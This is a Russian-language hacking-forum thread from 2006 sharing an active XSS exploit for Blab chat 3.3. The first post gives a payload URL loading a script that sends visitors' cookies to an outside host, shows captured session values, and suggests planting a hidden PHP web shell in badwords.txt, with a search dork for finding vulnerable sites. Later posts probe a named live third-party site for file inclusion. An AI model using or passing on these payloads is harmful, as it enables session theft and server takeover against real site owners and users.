HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Чаты
Перезагрузить страницу Blab chat Active XSS
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Blab chat Active XSS
  #1  
Старый 31.10.2006, 11:53
TANZWUT
Крёстный отец :)
Регистрация: 22.06.2005
Сообщений: 1,330
Провел на форуме:
5302668

Репутация: 2054


По умолчанию Blab chat Active XSS
решил поковыряца, под руками была только версия 3,3, думаю слипу интересно будет
http://localhost/chat/info.php?reason=<script%20src=http://localhost/s.js></script>

s.js
PHP код:
img = new Image(); img.src "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie
PHP код:
REFERER=http://localhost/chat/info.php?reason=%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%6C%6F%63%61%6C%68%6F%73%74%2F%73%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E
    QUERY=blab_id=1-bb2e48de1ba9a89497564acb9b584cc4blab_pass=813dfe9bd7b89fbcc5fd29d2be091bacblab_lang=9blab_time=3
    AGENT=Mozilla/4.0 (compatibleMSIE 6.0Windows NT 5.2Win64x64SV1
+ с правами админа можно сдампить БД юзеров,
при наличии локального инклуда на сайте
в badwords.txt можно безпалевно вписать
PHP код:
<?php system($_GET); ?>
- админ этого неувидит, а так же с обычными правами можно загрузить картинку с шелл кодом.
гугл inurl:"info.php?reason=link"
__________________
Лучший способ защиты - это нападение!!!
 

  #2  
Старый 31.10.2006, 12:14
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337

Репутация: 3486


По умолчанию
Отлично поработал Если есть чат на примете, в онлайне, кинь ссылку. А то через денвер в лом искать. Буду пробовать ещё что то сделать
__________________
..
 

Определение версии чата
  #3  
Старый 31.10.2006, 12:18
TANZWUT
Крёстный отец :)
Регистрация: 22.06.2005
Сообщений: 1,330
Провел на форуме:
5302668

Репутация: 2054


По умолчанию Определение версии чата
в самом низу
гугл inurl:"info.php?reason=link"

Определение версии чата - _http://www.host.ru/chat/version
__________________
Лучший способ защиты - это нападение!!!
Последний раз редактировалось TANZWUT; 31.10.2006 в 12:23..
 

  #4  
Старый 31.10.2006, 13:06
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337

Репутация: 3486


По умолчанию
Вот вам и такое=)
http://www.sisak.info/index.php?p=
__________________
..
 

  #5  
Старый 31.10.2006, 13:14
TANZWUT
Крёстный отец :)
Регистрация: 22.06.2005
Сообщений: 1,330
Провел на форуме:
5302668

Репутация: 2054


По умолчанию
фильтруются символы ".." и "/"
путь /home/sisak/public_html/
__________________
Лучший способ защиты - это нападение!!!
Последний раз редактировалось TANZWUT; 31.10.2006 в 13:18..
 

  #6  
Старый 20.04.2007, 14:52
Антошка2003
Постоянный
Регистрация: 03.04.2005
Сообщений: 610
Провел на форуме:
3238231

Репутация: 165


По умолчанию
пригодилось
 
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss для новичков Micr0b Уязвимости 79 06.07.2018 22:05
Active XSS in Invision Power Board 2.1.4 k00p3r Уязвимости 8 03.03.2006 20:51



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.